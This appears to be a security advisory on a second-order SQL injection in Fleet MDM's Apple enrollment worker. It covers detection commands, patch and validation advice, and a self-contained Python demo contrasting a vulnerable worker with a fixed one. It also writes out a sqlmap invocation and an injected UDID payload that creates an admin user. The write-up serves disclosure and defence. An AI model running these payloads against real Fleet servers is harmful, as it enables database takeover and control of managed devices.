The vulnerability is a second-order SQL injection in Fleet's Apple MDM pipeline. Exploitation begins when an attacker who holds a valid SCEP-issued enrollment certificate (used for mTLS) enrolls a malicious device. During the MDM Authenticate check-in the attacker supplies a specially crafted UDID. At that point the UDID is stored safely, with a parameterized query. The flaw is in the asynchronous worker job: when it later processes the enrollment, it reads the stored UDID back and interpolates it directly into a SQL string that is never sanitized. Because the database connection is configured with multiStatements=true, the injected value supports stacked queries as well as UNION-based and boolean-based blind injection, and the affected statement interpolates the value into four subqueries at once. The net effect is that data written through a safe parameterized insert reaches raw string concatenation in the background job, so any sanitization applied at the entry point is bypassed.
Platform: Fleet MDM
Version: prior to 4.53.0
Vulnerability: Second-Order SQLi
Severity: Critical
Date: 2024-11-26
Prediction: 2024-12-10
What Undercode Say (analysis):
Check for the multiStatements setting in the database connection string:
grep -r "multiStatements=true" /etc/fleet/
Monitor the async worker logs for SQL errors raised while processing UDIDs:
journalctl -u fleet | grep -i "sql" | grep -i "udid"
SQLMap run for second-order injection (conceptual; the endpoint paths are placeholders, and the worker only fires after the stored value is processed, so the second-order URL must be one whose response reflects the worker's result):
sqlmap -u "https://fleet.example.com/api/mdm/checkin" --data "UDID=malicious" --second-order "https://fleet.example.com/api/jobs/status" --dbms=mysql --technique=BEUST
Exploit:
An attacker with an enrolled device sends a malicious UDID containing a SQL payload (e.g., ' UNION SELECT ... -- -) during the MDM Authenticate step. The payload is stored in the database as ordinary data. When the async worker fetches the record, it concatenates the UDID into a SQL string and executes it, so the attacker's statements run with the worker's database privileges: they can execute arbitrary SQL, create admin users, or deploy malicious profiles.
Protection from this CVE
Upgrade to Fleet version 4.53.0 or later. If you cannot upgrade immediately, disable Apple MDM entirely in the Fleet configuration until the patch is applied. Enforce strict allow-list validation of UDID strings in both the enrollment handler and the worker, and make sure the worker binds the UDID as a query parameter rather than concatenating it. Removing multiStatements=true from the DSN only reduces stacked queries to UNION and blind techniques and may break features that depend on it, so treat it as defense in depth, not as the fix.
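The two-step pattern described above (safe parameterized insert at check-in, unsafe string interpolation in the worker) and the fix recommended here, as an added example that is not Fleet's code. sqlite3 stands in for MySQL, and executescript() stands in for the Go MySQL driver's multiStatements=true, since it is what lets a ';' inside an interpolated value start a second statement. The table and column names, the serial number, the attacker payload and the accepted UDID shapes are all assumptions made for the demo.

```python
import re
import sqlite3

# Constructed stand-in for Fleet's MySQL database. sqlite3 replaces MySQL, and
# executescript() replaces the Go MySQL driver's multiStatements=true, which is
# what lets a ';' inside an interpolated value start a second statement. Table
# and column names are assumptions for the demo, not Fleet's real schema.
SCHEMA = """
CREATE TABLE mdm_devices (udid TEXT PRIMARY KEY, serial_number TEXT, enrolled INTEGER DEFAULT 0);
CREATE TABLE users (id INTEGER PRIMARY KEY, email TEXT NOT NULL, admin INTEGER NOT NULL DEFAULT 0);
INSERT INTO users (email, admin) VALUES ('alice@example.com', 1);
"""

# Constructed attacker UDID: closes the quoted value, stacks an INSERT that
# creates an admin user, then comments out the rest of the worker's statement.
MALICIOUS_UDID = "x'; INSERT INTO users (email, admin) VALUES ('attacker@evil.test', 1); -- "

# Assumed acceptable UDID shapes: 40 hex chars (legacy) or 8 hex, dash, 16 hex.
UDID_RE = re.compile(r"^(?:[0-9A-Fa-f]{40}|[0-9A-Fa-f]{8}-[0-9A-Fa-f]{16})$")


def is_valid_udid(udid: str) -> bool:
    """Allow-list check a hardened Authenticate handler would apply before storing."""
    return bool(UDID_RE.fullmatch(udid))


def new_db() -> sqlite3.Connection:
    db = sqlite3.connect(":memory:")
    db.executescript(SCHEMA)
    return db


def authenticate_checkin(db: sqlite3.Connection, udid: str, serial: str) -> None:
    """Step 1 (first order): the MDM Authenticate handler stores the UDID with a
    parameterized query. This step is safe on its own; the payload is just data."""
    db.execute("INSERT INTO mdm_devices (udid, serial_number) VALUES (?, ?)", (udid, serial))
    db.commit()


def worker_vulnerable(db: sqlite3.Connection, serial: str) -> None:
    """Step 2 (second order, vulnerable): the async job reads the stored UDID back
    and builds SQL by string interpolation. With multi-statement execution the
    quote and ';' in the value turn one UPDATE into UPDATE + attacker INSERT."""
    (udid,) = db.execute(
        "SELECT udid FROM mdm_devices WHERE serial_number = ?", (serial,)
    ).fetchone()
    sql = f"UPDATE mdm_devices SET enrolled = 1 WHERE udid = '{udid}';"
    db.executescript(sql)  # stands in for multiStatements=true
    db.commit()


def worker_fixed(db: sqlite3.Connection, serial: str) -> None:
    """Same job with the value bound as a parameter: the UDID stays a string
    whatever it contains, and no second statement is possible."""
    (udid,) = db.execute(
        "SELECT udid FROM mdm_devices WHERE serial_number = ?", (serial,)
    ).fetchone()
    db.execute("UPDATE mdm_devices SET enrolled = 1 WHERE udid = ?", (udid,))
    db.commit()


def admin_emails(db: sqlite3.Connection) -> list:
    return sorted(e for (e,) in db.execute("SELECT email FROM users WHERE admin = 1"))


def run_pipeline(vulnerable: bool) -> list:
    """Enroll a device with the malicious UDID, run the worker, report admins."""
    db = new_db()
    authenticate_checkin(db, MALICIOUS_UDID, "C02TEST00001")
    (worker_vulnerable if vulnerable else worker_fixed)(db, "C02TEST00001")
    return admin_emails(db)


if __name__ == "__main__":
    print("vulnerable worker ->", run_pipeline(True))   # attacker becomes admin
    print("fixed worker      ->", run_pipeline(False))  # only alice remains admin
    print("payload passes UDID allow-list?", is_valid_udid(MALICIOUS_UDID))
```

The vulnerable path shows why sanitizing at the entry point is not enough: the insert in authenticate_checkin is correct, yet the worker still executes the attacker's INSERT. Binding the value in worker_fixed removes the injection regardless of driver settings; is_valid_udid adds the allow-list check at enrollment so that a payload like this never reaches storage in the first place.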
Impact
An attacker can exfiltrate sensitive database contents, including user credentials and API tokens. They can also escalate privileges by inserting new admin accounts, modify configuration, deploy malicious profiles to managed devices, or delete critical data, leading to full system compromise.
Sources:
Reported By: github.com

